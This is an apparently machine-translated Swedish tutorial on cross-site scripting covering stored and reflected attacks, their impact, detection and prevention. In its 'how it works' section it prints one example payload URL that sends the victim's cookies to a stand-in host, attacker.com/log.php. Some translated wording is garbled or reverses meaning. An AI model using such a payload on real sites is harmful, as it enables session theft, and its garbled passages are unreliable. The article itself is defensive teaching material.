Introduktion till Cross Site Scripting

  • Med det ökande antalet webbapplikationer på Internet har webbsäkerhet nu blivit ett viktigt problem. Det är nu vanligt att hacka och stjäla användarnas privata data och det hotar dem att använda alla program. Cross Site Scripting är ett av de populära attackerna på webbsäkerheten för användare. Låt oss få lite inblick i vad scripting på flera webbplatser är.
  • Cross Site Scripting kallas XSS, är en datasäkerhetsproblem där angriparen syftar till att lägga till någon skadlig kod i form av skript till en betrodd webbplats / webbsida. Det är en kodinjektionsattack av klientsidan och det skadliga skriptet körs i användarens webbläsare när han går in på webbplatsen / webbsidan. Indirekt blir denna webbplats ett medium för att skicka den skadliga koden till användaren. Genom att injicera skript angripare kringgå DOM (Document Object Model) av säkerhetsbegränsningar och få tillgång till användarens känsliga sidinnehåll, sessionskakor, webbläsarhistorik för det mesta av de privata data som upprätthålls av webbläsaren.
  • Webbplats som innehåller forum, anslagstavlor, webbsidor som tillåter kommentarer och de som använder osaniserad användarinmatning och den utmatning som på så sätt genereras är mest utsatta för XSS-attacker. Även om XSS-attackerna är möjliga i VBScript, ActiveX och CSS är de vanligast i Javascript som ett grundläggande för de flesta surfupplevelser.

Olika typer av Cross Site Scripting (XSS)

Även om det inte finns någon särskild klassificering av Cross Site Scripting, har vissa experter klassificerat det i två typer som diskuteras nedan i detalj:

Lagrade XSS-attacker :

  • Lagrad XSS är de där det skadliga skriptet som injiceras av angriparen lagras i databasen och körs i användarens webbläsare när han försöker komma åt databasen i någon form. Dessa kallas också Persistent eller lagrad XSS. Detta är en av de mest förödande attackerna och händer särskilt när webbplatsen / webbsidan tillåter kommentarer eller tillåter inbäddning av HTML-innehåll.
  • Angriparen lägger till javascript i kommentaren som lagras i databasen och när användaren öppnar den drabbade sidan hämtar data från databasen det skadliga skriptet körs i sin webbläsare och den angriparen får obehörig åtkomst till användarens privata data.
  • Till exempel, på en e-handelswebbplats som Olx som har en oanitiserad meddelanderuta för produktbeskrivning, lägger en angripare som produktförsäljare det skadliga javascriptet i det och det kommer att lagras i webbplatsens databas.
  • När köparen kommer att öppna produktbeskrivningen för att se detaljerna om produkten kommer nu att bli offer när skriptet körs i sin webbläsare och alla detaljer om användaren som webbläsaren tillåter kommer att kapas.

Förfarande XSS-attacker:

  • Detta är ett av de vanligaste sätten på vilket en angripare kan orsaka en XSS-attack på användaren. I princip, i procedur XSS-attacker, riktar angriparen offret genom att skicka ett e-postmeddelande, en skadlig länk eller bifoga en sträng i sökresultatet som pekar på en betrodd webbplats men innehåller den skadliga javascriptkoden.
  • Om ett offer klickar på den URL: en startar HTTP-begäran och det skickar en begäran till den sårbara webbapplikationen. Begäran kommer sedan tillbaka till offret med ett svar på inbäddad javascript-kod som webbläsaren kör, med tanke på att den kommer från en betrodd webbplats resulterar i kapning av webbläsarens konfidentiella data.
  • På en e-handelswebbplats finns det till exempel en sökruta där en användare kan söka i artiklarna och strängen skriven i sökrutan är synlig i webbadressen på webbplatsen när sökbegäran skickas till servern.
  • Angriparen skapar en länk där det skadliga skriptet är sammankopplat i URL: en och skickas till offret via e-post. När offret öppnar den länken skickas begäran till angriparens webbplats och all webbläsardata från offret kapas och skickas till angriparens system.

Hur fungerar Cross Site Scripting (XSS)?

  • I XSS-sårbarhet (Cross Site Scripting) är angriparens huvudmotiv att stjäla användarens data genom att köra det skadliga skriptet i sin webbläsare som injiceras i webbplatsinnehållet som användaren använder på olika sätt.
  • När en användare till exempel söker efter text på en webbplats skickas begäran till servern i formen:

https://www.abcwebsite.com/search?q=text1

I sökresultatet returnerar webbplatsen resultatet tillsammans med vad användaren sökte efter:

Du sökte efter: text1

Om sökfunktionen är sårbar för XSS kan angriparen lägga till det skadliga skriptet i URL: n:

https://www.abcwebsite.com/search= dokumentplats = https: //attacker.com/log.php? c = '+ kodURURIComponent (document.cookie)
  • När offret klickar på den här länken omdirigeras den till den skadliga webbplatsen, dvs. https://attacker.com och all webbläsardata skickas direkt till angriparens dator vilket resulterar i att angriparen stjäl alla sessionens token / cookies.
  • På detta sätt injicerar en angripare sitt skadliga skript i URL: en, kan Attacker också lagra det skriptet på servern som kommer under Stored XSS.

Effekterna av sårbarheter på olika sätt i skript:

Effekterna av Cross Site Scripting varierar mycket. Efter att ha utnyttjat XSS-sårbarheten får en angripare full kontroll över offrets webbläsare och kan utföra olika åtgärder som varierar från små som att titta på webbläsarens historia till katastrofala sådana som att sätta in maskar i datorn.

Några av de åtgärder som angriparen kan utföra genom att utnyttja XSS-sårbarheten är följande:

  1. Läcker känslig information som användarnamn och lösenord.
  2. Sätta i maskar på datorn.
  3. Omdirigera användaren till någon farlig webbplats och tvinga att utföra några åtgärder
  4. Få åtkomst till offrets surfhistorik.
  5. Installation av Trojan-hästprogram.
  6. Tvinga användaren att utföra och ändra värdena i applikationen genom att få åtkomst över

Hitta säkerhetsproblem på flera olika webbplatser:

  • XSS-sårbarheter uppstår av två orsaker, antingen ingången från användaren är inte validerad innan den skickas till servern eller så får den utgång som mottas till webbläsaren inte HTML-kodad. Med tanke på den katastrofala effekten av XSS-sårbarhet och skydd av användarnas integritet är det mycket viktigt att ta reda på om webbapplikationen är sårbar för XSS eller inte.
  • Även om XSS är svårt att identifiera och ta bort, är det bästa sättet att kontrollera att utföra säkerhetsgranskningen av koden och kontrollera om alla platser där ingången från HTTP-begäran kan göra sitt sätt att visas som utgång i en applikation. Att använda de automatiska sårbarhetsskannerns verktyg som innehåller specialiserade XSS-skannermoduler för att skanna hela webbapplikationen kan också hjälpa till att skanna och hitta sårbarheterna i ett program.

H ow för att förhindra XSS?

  • XSS är en sårbarhet för kodinjektion, så det är mycket viktigt att koda data som skickas till servern och data som kommer från servern till en användares webbläsare.
  • Datavalidering är också mycket viktigt så att webbläsaren tolkar koden utan skadliga kommandon. Olika förebyggande metoder infördes för att hålla datavalidering och kodning som en prioritering för att en webbplats ska vara sårbar för XSS.

Vissa punkter måste fokuseras för att förhindra XSS: -

  1. HTTP Trace-stöd på alla webbservrar bör stängas av eftersom angriparen kan stjäla cookien och privata webbläsardata via ett HTTP-spårsamtal från servern även om document.cookie är inaktiverat i offerets webbläsare.
  2. Utvecklare bör sanera ingången och ska aldrig mata ut data direkt mottagna från användaren utan att validera den.
  3. Länkar bör i allmänhet tillåtas om de inte börjar med de vitlistade protokollen som HTTP: //, https: // och därmed förhindrar användning av URI-schema som javascript: //

Slutsats:

XSS-attacker är farliga och kan skada användarens integritet och stjäla uppgifterna såvida inte den vanliga användaren bläddrar i applikationen noggrant. Så utvecklare under utveckling av applikationen bör följa de strikta säkerhetsreglerna särskilt för både data och server så att applikationen är minst sårbar för XSS och fler användare kan lita på den.

Rekommenderade artiklar

Detta har varit en guide till Vad är Cross Site Scripting ?. Här diskuterar vi olika typer av tvärplatser, arbete, påverkan och förebyggande av XSS. Du kan också gå igenom våra andra föreslagna artiklar för att lära dig mer -

  1. Hur JavaScript fungerar
  2. Vad är en phishingattack?
  3. Vad är en Cyber ​​Attack?
  4. HTTP-caching
  5. Hur fungerar Cookies i JavaScript med Exempel?

Kategori: